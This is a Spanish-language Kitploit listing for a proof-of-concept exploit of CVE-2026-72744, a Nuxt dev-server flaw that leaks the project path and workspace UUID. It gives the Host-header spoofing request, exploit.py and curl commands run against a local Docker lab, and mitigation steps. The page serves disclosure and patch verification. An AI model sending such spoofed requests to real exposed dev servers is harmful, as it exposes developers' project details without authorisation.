Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-72744-poc — Prueba de concepto de exploit para CVE-2026-72744, una vulnerabilidad de divulgación de información en el endpoint del espacio de trabajo de Chrome DevTools del servidor de desarrollo de Nuxt. Demuestra la falla y verifica la corrección. | Kitploit
Herramientas/GitHubGitHub/saku0512/cve-2026-72744-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPapers e InvestigaciónAprendizaje y Educación
GitHubsaku0512/cve-2026-72744-poc

CVE-2026-72744-poc

Prueba de concepto de exploit para CVE-2026-72744, una vulnerabilidad de divulgación de información en el endpoint del espacio de trabajo de Chrome DevTools del servidor de desarrollo de Nuxt. Demuestra la falla y verifica la corrección.

Ver Repositorio
hace 5h 18mAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-72744: Fuga de información del endpoint Chrome DevTools de Nuxt PoC

English version

Resumen

Este repositorio es una Prueba de Concepto (PoC) de la vulnerabilidad de fuga de información CVE-2026-72744 presente en el endpoint del workspace de Chrome DevTools del servidor de desarrollo de Nuxt.

El servidor de desarrollo vulnerable determina si el origen de la conexión es local basándose en cabeceras HTTP como Host, que el atacante puede especificar, en lugar de la dirección TCP peer. Si el servidor de desarrollo está vinculado a 0.0.0.0, un atacante no autenticado en la LAN puede obtener la ruta absoluta del proyecto y un UUID de workspace persistente mediante una solicitud con la cabecera Host: localhost.

Esta PoC inicia Nuxt 4.5.0 (versión vulnerable) y 4.5.1 (versión corregida) en Docker y envía la misma solicitud desde el host para confirmar la diferencia de comportamiento. No realiza lectura/escritura de archivos ni ejecución de código.

Aviso legal

Utilícelo únicamente con fines educativos y para verificaciones de seguridad autorizadas. No envíe solicitudes no autorizadas a entornos de terceros.

Detalles de la vulnerabilidad

  • ID CVE: CVE-2026-72744
  • Producto: Nuxt
  • Tipo: Fuga de información (CWE-200)
  • Versiones afectadas: >= 4.4.7, < 4.5.1 y >= 3.21.7, < 3.21.10
  • Versiones corregidas: 4.5.1 / 3.21.10
  • Objetivo: Solo el servidor de desarrollo (la compilación de producción no se ve afectada)
  • Requisitos: Un bind accesible desde la red y experimental.chromeDevtoolsProjectSettings habilitado por defecto
  • Impacto: Fuga de la ruta absoluta de rootDir y del UUID del workspace específico del proyecto

Causa raíz

En la versión vulnerable, isLocalDevRequest trata una solicitud como local si Host está en la lista de permitidos y no hay cabeceras de sitio cruzado provenientes del navegador. Como los clientes que no son navegadores pueden omitir o especificar libremente estas cabeceras, la siguiente solicitud supera la verificación.

root@kitploit:~
GET /.well-known/appspecific/com.chrome.devtools.json HTTP/1.1
Host: localhost

La versión corregida, además de la verificación de cabeceras existente, exige que la dirección TCP peer real sea de bucle local (127.0.0.0/8 o ::1).

Prueba de Concepto (uso)

1. Inicio del entorno

root@kitploit:~
docker compose up -d --build
URLVersiónResultado esperado
http://localhost:3000Nuxt 4.5.0HTTP 200, fuga de información
http://localhost:3001Nuxt 4.5.1HTTP 403

La primera compilación puede tardar unos minutos en obtener los paquetes npm.

2. Verificación de la versión vulnerable

root@kitploit:~
python3 exploit.py -t http://localhost:3000 --expect vulnerable

Salida esperada:

root@kitploit:~
[!] VULNERABLE: the endpoint disclosed workspace.root and workspace.uuid.

3. Verificación de la versión corregida

root@kitploit:~
python3 exploit.py -t http://localhost:3001 --expect fixed

Salida esperada:

root@kitploit:~
[+] FIXED: the non-loopback request was rejected with HTTP 403.

4. Comprobación con curl

root@kitploit:~
curl -i -H 'Host: localhost' \
  http://localhost:3000/.well-known/appspecific/com.chrome.devtools.json

curl -i -H 'Host: localhost' \
  http://localhost:3001/.well-known/appspecific/com.chrome.devtools.json

Dado que la solicitud pasa por el reenvío de puertos de Docker, el origen visto desde el contenedor no es de bucle local. Esto permite reproducir en un solo host las condiciones equivalentes a un ataque desde la LAN.

5. Limpieza

root@kitploit:~
docker compose down -v

Criterios de detección de la PoC

exploit.py especifica Host: localhost y accede al endpoint objetivo sin enviar Origin, Referer ni Sec-Fetch-Site. Solo se considera vulnerable si el JSON con HTTP 200 contiene las cadenas workspace.root y workspace.uuid. HTTP 403 es el comportamiento esperado en la versión corregida.

Mitigación

Actualice Nuxt a 4.5.1 o posterior en la serie 4, y a 3.21.10 o posterior en la serie 3. Si no puede actualizar, vincule el servidor de desarrollo solo a loopback o establezca experimental.chromeDevtoolsProjectSettings: false.

Información de referencia

  • GitHub Security Advisory GHSA-7c4v-fwgw-9rf7
  • Nuxt 4.5.1 release
  • Fix commit
  • NVD: CVE-2026-72744
Descargar herramienta